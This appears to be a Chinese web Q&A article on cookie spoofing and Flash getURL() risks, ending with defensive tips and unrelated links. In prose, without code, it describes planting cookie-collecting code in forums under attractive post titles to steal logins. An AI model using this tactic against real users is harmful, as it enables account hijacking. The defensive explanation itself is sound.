Cookie記錄著用戶的帳戶ID、密碼之類的信息,如果在網(wǎng)上傳遞,通常使用的是MD5方法加密。這樣經(jīng)過加密處理后的信息,即使被網(wǎng)絡(luò)上一些別有用心的人截獲,也看不懂,因為他看到的只是一些無意義的字母和數(shù)字。然而,現(xiàn)在遇到的問題是,截獲Cookie的人不需要知道這些字符串的含義,他們只要把別人的Cookie向服務(wù)器提交,并且能夠通過驗證,他們就可以冒充受害人的身份,登陸網(wǎng)站。這種方法叫做Cookie欺騙。Cookie欺騙實現(xiàn)的前提條件是服務(wù)器的驗證程序存在漏洞,并且冒充者要獲得被冒充的人的Cookie信息。目前網(wǎng)站的驗證程序要排除所有非法登錄是非常困難的,例如,編寫驗證程序使用的語言可能存在漏洞。而且要獲得別人Cookie是很容易的,用支持Cookie的語言編寫一小段代碼就可以實現(xiàn)(具體方法見三),只要把這段代碼放到網(wǎng)絡(luò)里,那么所有人的Cookie都能夠被收集。如果一個論壇允許HTML代碼或者允許使用Flash標(biāo)簽就可以利用這些技術(shù)收集Cookie的代碼放到論壇里,然后給帖子取一個吸引人的主題,寫上有趣的內(nèi)容,很快就可以收集到大量的Cookie。在論壇上,有許多人的密碼就被這種方法盜去的。至于如何防范,目前還沒有特效藥,我們也只能使用通常的防護方法,不要在論壇里使用重要的密碼,也不要使用IE自動保存密碼的功能,以及盡量不登陸不了解底細(xì)的網(wǎng)站。
2.Flash的代碼隱患
Flash中有一個getURL()函數(shù),F(xiàn)lash可以利用這個函數(shù)自動打開指定的網(wǎng)頁。因此它可能把你引向一個包含惡意代碼的網(wǎng)站。打個比方,當(dāng)你在自己電腦上欣賞精美的Flash動畫時,動畫幀里的代碼可能已經(jīng)悄悄地連上網(wǎng),并打開了一個極小的包含有特殊代碼的頁面。這個頁面可以收集你的Cookie、也可以做一些其他的事情,比如在你的機器上種植木馬甚至格式化你的硬盤等等。對于Flash的這種行為,網(wǎng)站是無法禁止的,因為這是Flash文件的內(nèi)部行為。我們所能做到的,如果是在本地瀏覽盡量打開防火墻,如果防火墻提示的向外發(fā)送的數(shù)據(jù)包并不為你知悉,最好禁止。如果是在Internet上欣賞,最好找一些知名的大網(wǎng)站。
以上就是關(guān)于cookie信息被瀏覽器收集相關(guān)問題的回答。希望能幫到你,如有更多相關(guān)問題,您也可以聯(lián)系我們的客服進行咨詢,客服也會為您講解更多精彩的知識和內(nèi)容。
推薦閱讀:
推特網(wǎng)頁版twicopy(推特網(wǎng)頁版入口)
杭州cosplay服裝租賃(杭州哪里有cosplay服裝租賃的)
廣東園林景觀設(shè)計圖片(廣東園林景觀設(shè)計圖片高清)